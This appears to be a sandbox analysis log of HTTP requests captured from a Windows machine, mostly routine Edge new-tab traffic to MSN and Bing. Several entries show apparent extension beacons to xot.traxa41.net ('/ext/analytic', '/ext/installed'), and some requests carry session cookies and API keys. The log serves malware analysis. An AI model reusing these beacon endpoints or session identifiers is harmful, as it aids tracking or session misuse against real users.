Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/notification-bell-wc.dd601018956dbb3a4fb7.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedback.3220005356a33ce0ca94.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/na-trending.e1c8353f6c85262a7e58.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/superBreakingNews.b103d390df46602376d8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-one-liner.48b10cbc534ebb1a7fad.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/digest-card.7224d7f5906215f25e3c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/toast-wc.6cd4b923cfe7c0d8b058.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ms-rewards-wc.9abca88189e342bde963.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /breakingnews/v1/cms/api/amp/article/AA157JY HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sign-in-control-wc.ce912a6f76a1497532ac.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/copilot_color.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedDependencies.6629e7599f3739138e10.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/mobile-app-upsell.b15413e73bafe92e0855.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-d085cf.36490bde8dc8dec85933.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-data-connector.b0240aa589a42dc6a0bc.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1Host: www.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Search-UILang: en-ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47X-PERSONALBING-FLIGHTS: msnallexpusers,prg-sp-liveapi,prg-cg-homepagec,premms-sc-sc_roer3,prg-c-arb-rsz,1s-wpo-vsocc,prg-sriver-wpo,ads-prec-fix,sid-finalval,sidamo-flr-stage-2,preshp-xap-prod,prg-1sw-sa-annquota14,prg-1sw-sageimterav3i2c,prg-1sw-sacfxevery2-t1,prg-1sw-sa-distillation4-t1,prg-1sw-saerevrfcc,traffic-1sw-sim,prg-1sw-sim-adapt,prg-cg-ntv-ad-blnd,prg-1sw-p1widinc-2d,1s-wpo-pr1-3colnodem,prg-1sw-p1widinc,1s-tpsn-wapiprg-t,1s-tpsn-wapidestprg,prg-cg-featured-c,traffic-1-lkscinc-t,prg-1sw-lksincstbl,1s-aadp1dynasize,1s-p1-cgtab-r1hp,prg-fin-cdicon,prg-fin-l2tnews1,prg-fin-l2tnews,btrecenus,iframeflex,prg-adspeek,prg-fin-errde,1s-winauthservice,flight0417cf_4,prg-rfrcsmc,prg-pr2-flashrev,btie-fancy-img-c,prg-ad-ai-imgf-c,1s-fcrypt,prg-cookiecont,prg-ctr-pnpc,prg-entpremier-pr2-c,1s-prealgo855,1s-xapentprong2,prg-p2-prmft,prg-pr2-entprem-c,1s-ntf2-exdrc,1s-ntf2-exdr,1s-ntf2-marf5,1s-wpo-pr2-dpucd5,prg-pr2-noreqcap,prg-upsaip-w1-t,prg-upsaip-r-t,prg-vidbuf1,1s-rpssecautht,1s-shp-rc-tc-rmsanc,jj_fac_t,traffic-pr2-cmsev-c,1s-tpsn-wapiprg2-t,1s-tpsn-wapidestprg2,prg-cg-cmga,prg-cg-cmgroupa,prg-pr2-svganimac,prg-ad-pdedupe-c,prg-unified-p2,1s-p2-promotedondmd,1s-wpo-pr2-promad,prg-2unified-uc-t,1s-wpo-pr2-sdcginrailt3c,1s-wpo-prg2-ioctrl,1s-wpo-pr2-fsearch,1s-defaultscn,prg-1sw-pde0,1s-defaultscnw,prg-csacclink-c,1s-notifmapping,1s-shp-rc-t-v7np350,1s-shp-rc-t2-v7_2addneg,1s-shp-rc-t3-v7np350,1s-shp-rc-te-v7_2addneg,prg-sh-lowinv1,prg-sh-lowinv,prg-1sw-srdus,prg-cg-notf2,prg-cg-notf,prg-sh-dealsdaypdp,1s-xapbnze,prg-sh-rmitmlnk,nopinglancecardit,prg-chnl-umf-follow,prg-cg-ingames-ct,prg-sh-recopdp,prg-sh-bd-newbanner,mktautosqor,prg-1sw-rr2fn,prg-1sw-rr2fp,prg-strrtng-g1,prg-cg-c-hb,prg-ugc-likechange,prg-1sw-wxmptreplace,prg-1s-wpocfpc,ads-oshkpstgt-c,prg-pr2-sidebar-5-t,1s-sl-halfucards,prg-pr2-pagecontext,prg-pr2-shoreline,prg-pr2-sidebar,prg-sh-bd-newchckot,prg-sh-bd-nwchk,msph-tdinmsph,prg-sh-bd-disgb-c,msph-feedinternal,nonmobile-t,revprmres,1s-temp-wid-t,prg-1s-twid,msph-onboardconfig,hp-bot-seo,prg-1sw-iconmap,1s-uasdisf-t,prg-wx-ncar,1s-user-ctrl-rotc1,ads-usepme-c,prg-1sw-finvldc,prg-rpt2,prg-cg-dom-cleac,0age5412,ads-anjson-migt,1s-servicetelemetry,sh-bdvid,prg-sh-bd-video,fv-channel-stagc,prg-1s-sm-workid,prg-1s-workid,vws-chpgv2-lgtn,prg-chpg-ldgw,msph-contoverview,msph-mergedfeedapi,ads-sharvia-migr,msph-aiacselect,1s-blis-followloc,1s-wpo-ntp-hero-t,msph-mngcontrep,msph-c2scontrep,msph-newrsvideo,prg-1s-mm-wid-t,cswea-ovwntout,prg-1sw-iplsdp2,prg-1sw-iplsdp1,prg-1sw-iplsd-ntp,prg-1sw-iplsdc1p2,prg-1sw-iplsdc-ntp,prg-whp-minil1,prg-1sw-popularc,prg-ad-va-rf-c,prg-
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/RewardsData.d04fc8c7d4c8170f30ae.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/RewardsCoachmarkData.c462c3980af18bc60b9d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.e6fcf9edbaadfb663ccb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ext/analytic?do=init&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ext/installed?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/News/Users/me/Rewards?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=rewards-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON&version=2 HTTP/1.1Host: assets.msn.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA12Q7vH.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/grid-view-feed.f421ed2fe498976a2181.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /124bcd1a-f3d7-4fb7-9a67-95cb55e1369b/e98de748-51c9-427f-bc64-8a50262c8fdb.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.9abeb397be7183994289.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-components_follow-publisher-button_dist_index_js.bdee2604ba001760eaa1.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ext/analytic?do=init&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ext/installed?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
